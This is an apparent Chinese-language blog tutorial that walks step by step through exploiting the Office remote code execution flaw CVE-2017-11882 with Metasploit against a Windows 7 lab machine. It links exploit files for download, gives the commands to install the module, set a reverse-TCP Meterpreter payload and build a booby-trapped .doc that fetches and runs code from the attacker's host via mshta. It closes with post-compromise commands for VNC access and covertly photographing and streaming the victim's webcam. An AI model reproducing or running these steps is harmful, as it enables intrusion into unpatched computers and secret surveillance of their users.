2017年11月14日,微軟發佈了11月份的安全補丁更新,其中比較引人關注的莫過於悄然修復了潛伏17年之久的Office遠程代碼執行漏洞(CVE-2017-11882)。該漏洞爲Office內存破壞漏洞,影響目前流行的全部Office版本。gongji者能夠利用漏洞以當前登陸的用戶的身份執行任意命令。漏洞影響版本:Office 365
Microsoft Office 2000 python
Microsoft Office 2003 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 Microsoft Office 2013 Service Pack 1 Microsoft Office 2016
工具連接:https://pan.baidu.com/s/1cAPboI5lawjxD2VPT13ABA 密碼:fxrf
仍是老樣子KaliLinux作gongji機 ip:192.168.1.126
受害者主機Windows7 ip:192.168.1.128
1.首先把cve開頭的文件放到kalilinux使用
2.將cve_2017_11882.rb文件複製到/usr/share/metasploit-framework/modules/exploits/windows/smb/目錄下
mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
ls /usr/share/metasploit-framework/modules/exploits/windows/smb/ 查看一下
3.再將cve_2017_11882.rtf放到/usr/share/metasploit-framework/data/exploits/ 目錄下
mv cve_2017_11882.rtf /usr/share/metasploit-framework/data/exploits
ls /usr/share/metasploit-framework/data/exploits
4.打開神器圖形化操做的msf(命令都同樣只是這個更容易方便演示)
爲了大家太萌新我特意標了一下如何掃描ip地址和爆系統而後輸入ip地址便可(只是爲了效果好而已)
linux
小電腦就出來了還猜出來是Windows7
5.而後在下面輸入search cve_2017_11882查看有沒有加載進去這個模塊
可能我版本比較高因此官方已經出了這個模塊因此有兩個
6.use exploit/windows/smb/cve_2017_11882 使用這個模塊
7.set payload windows/meterpreter/reverse_tcp
show options 查看一下配置
8.set lhost 192.168.1.126 爲本身的gongji機
set uripath emmm emmm爲路徑稍後用python生成腳本的時候用獲得(後面我又改爲test了 而後 set lport 4444改一下端口才運行)
show options 再看一下配置web
(後面uripath我又改爲test了 而後 set lport 4444改一下端口才運行)
9.exploit -j 運行
10.在終端生成doc文件
python Command109b_CVE-2017-11882.py -c "mshta http://192.168.1.126:8080/test" -o test.doc 生成doc文件
而後將doc文件放到Windows7上(順便安裝office)
看到這個文檔而後手賤點了一下
成功
而後仍是老樣子
getuid getpid getvnc
webcam_list 查看下攝像頭 webcam_snf 1 照個照片 webcam_stream 開個網頁查看攝像頭
windows